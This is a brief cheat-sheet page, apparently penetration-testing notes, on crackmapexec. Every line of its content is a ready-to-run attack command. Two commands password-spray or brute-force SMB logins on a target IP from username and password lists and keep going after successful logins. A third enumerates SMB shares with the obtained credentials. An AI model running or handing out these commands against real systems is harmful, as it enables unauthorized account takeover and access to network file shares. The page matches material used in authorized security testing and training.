Skip to main content

crackmapexec


Using crackmapexec to attack user accounts

crackmapexec smb <TARGET IP> -u usernames.txt -p passwords.txt --continue-on-success

crackmapexec smb <TARGET IP> -u usernames.txt -p 'passw0rd!' --continue-on-success

Listing SMB shares

crackmapexec smb <TARGET IP> -u $USERNAME -p "$PASSWORD" --shares